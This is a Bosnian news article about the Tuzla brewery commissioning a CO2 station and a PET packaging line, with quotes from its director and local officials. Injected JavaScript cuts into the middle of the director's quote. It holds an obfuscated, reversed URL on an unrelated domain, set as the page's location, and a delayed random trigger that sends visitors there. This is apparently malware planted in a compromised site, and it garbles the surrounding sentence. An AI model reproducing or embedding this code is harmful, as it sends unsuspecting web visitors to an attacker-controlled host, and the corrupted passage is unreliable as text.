Najsavremeniji u BiH: Pivara Tuzla u rad pustila sisteme za CO2 i pakovanje proizvoda

Puštanje u rad ovih sistema uslijedilo je nakon proširenja i asfaltiranja kruga kompanije i rekonstrukcije dijela proizvodnog objekta.

U prvom kvartalu ove godine kroz svoj investicijski ciklus Tuzlanska pivara utrošila je više od 500.000 KM, a do kraja ove godine predviđena je realizacija projekata u iznosu većem od pet miliona maraka.

“S ponosom mogu reći da je stanica za CO2 najsavremenija u BiH i ispunjava sve sttog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andarde Evropske unije. S druge strane, imamo i najsavremeniju opremu pomoću koje se radi kompletna linija kada je riječ o PET programu. Tu se pakuju svi proizvodi, od piva, preko mineralne vode do sokova različitih okusa. Također, tu se rade i proizvodi koji odlaze van granica BiH”, rekao je direktor Tuzlanske pivare Fahrudin Salihović.

Inače, proizvodi Pivare Tuzla već dvije godine su zastupljeni u Turskoj, a najavljenim ulaganjima u proizvodnom procesu menadžment ove kompanije želi izaći i na brojna druga tržišta izvan granica BiH.

“Mi se polako, sigurnim koracima, pripremamo za izlazak na nova tržišta”, poručio je Salihović, naglasivši da se ova kompanija trenutno nalazi među 100 najboljih u našoj zemlji.

Svečanom puštanju u rad novih sistema prisustvovao je i gradonačelnik Tuzle Jasmin Imamović koji je tom prilikom ocijenio da ova kompanija predstavlja važan motor razvoja BiH u cijelosti.

Ministar trgovine, turizma i saobraćaja TK Mirsad Gluhić prilikom obilaska novih sistema istakao je da ulaganje u proizvodnju predstavlja i širenje broja radnih mjesta.

On je naglasio i da Tuzlanska pivara predstavlja školski primjer kako treba ulagati u proizvodnju.

Klix
Pogrebni prevoz Iris Lim Profi Prijedor Panta rhei Prijedor

You must be logged in to post a comment Login